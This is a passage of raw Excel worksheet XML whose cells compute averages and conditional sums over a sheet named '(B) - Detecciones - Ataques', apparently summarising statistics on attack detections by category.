      </c>
      <c r="DB131" s="498" t="s">
        <v>370</v>
      </c>
      <c r="DC131" s="498" t="s">
        <v>394</v>
      </c>
      <c r="DD131" s="498" t="s">
        <v>1687</v>
      </c>
      <c r="DE131" s="498" t="s">
        <v>486</v>
      </c>
      <c r="DF131" s="498" t="s">
        <v>1889</v>
      </c>
      <c r="DG131" s="498" t="s">
        <v>1187</v>
      </c>
      <c r="DH131" s="498" t="s">
        <v>560</v>
      </c>
      <c r="DI131" s="498" t="s">
        <v>1175</v>
      </c>
      <c r="DJ131" s="499" t="s">
        <v>1926</v>
      </c>
      <c r="DK131" s="271"/>
    </row>
    <row r="132">
      <c r="J132" s="277"/>
      <c r="K132" s="530"/>
      <c r="L132" s="530"/>
      <c r="M132" s="531"/>
      <c r="N132" s="530"/>
      <c r="O132" s="278"/>
      <c r="Q132" s="271"/>
      <c r="R132" s="352" t="s">
        <v>2551</v>
      </c>
      <c r="S132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.0003253619652</v>
      </c>
      <c r="T132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="U132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>0.2513157895</v>
      </c>
      <c r="V132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>0.05555555556</v>
      </c>
      <c r="W132" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>0</v>
      </c>
      <c r="X132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>0.2</v>
      </c>
      <c r="Z132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>9.142787045</v>
      </c>
      <c r="AA132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>0.1153846154</v>
      </c>
      <c r="AB132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>0.4965277778</v>
      </c>
      <c r="AC132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>1.8</v>
      </c>
      <c r="AD132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.01550267642</v>
      </c>
      <c r="AE132" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>0.5</v>
      </c>
      <c r="AF132" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BL$3:$BL$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.01</v>
      </c>
      <c r="AG132" s="271"/>
      <c r="AH132" s="352" t="s">
        <v>2551</v>
      </c>
      <c r="AI132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.0006507239304</v>
      </c>
      <c r="AJ132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0</v>
      </c>
      <c r="AL132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0</v>
      </c>
      <c r="AN132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.002631578947</v>
      </c>
      <c r="AR132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.1666666667</v>
      </c>
      <c r="AS132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>1</v>
      </c>
      <c r="AU132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AV132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AW132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0.2222222222</v>
      </c>
      <c r="AY132" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB132" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>1</v>
      </c>
      <c r="BI132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>4.659348739</v>
      </c>
      <c r="BN132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>15.88993331</v>
      </c>
      <c r="BO132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.5</v>
      </c>
      <c r="BZ132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0</v>
      </c>
      <c r="CA132" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC132" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>2</v>
      </c>
      <c r="CL132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>0.375</v>
      </c>
      <c r="CN132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0</v>
      </c>
      <c r="CP132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>9</v>
      </c>
      <c r="CQ132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.03775868706</v>
      </c>
      <c r="CT132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.001996007984</v>
      </c>
      <c r="CU132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>0</v>
      </c>
      <c r="CZ132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH132" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI132" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ132" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BL$3:$BL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0</v>
      </c>
      <c r="DK132" s="271"/>
    </row>
    <row r="133">
      <c r="J133" s="277"/>
      <c r="K133" s="512"/>
      <c r="L133" s="512"/>
      <c r="M133" s="535" t="s">
        <v>30</v>
      </c>
      <c r="N133" s="512"/>
      <c r="O133" s="278"/>
      <c r="Q133" s="271"/>
      <c r="R133" s="352" t="s">
        <v>2552</v>
      </c>
      <c r="S133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.4551341086</v>
      </c>
      <c r="T133" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DB$3:$DB$139,
